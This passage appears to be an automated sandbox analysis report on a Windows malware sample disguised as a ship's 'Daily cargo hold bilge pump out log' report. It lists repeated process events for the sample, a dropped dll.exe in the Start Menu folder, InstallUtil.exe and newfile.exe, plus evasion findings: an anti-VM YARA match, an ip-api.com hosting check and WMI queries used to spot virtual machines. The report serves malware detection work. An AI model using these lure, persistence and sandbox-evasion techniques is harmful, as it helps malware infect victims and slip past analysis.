Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe PID: 7336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dll.exe PID: 6048, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

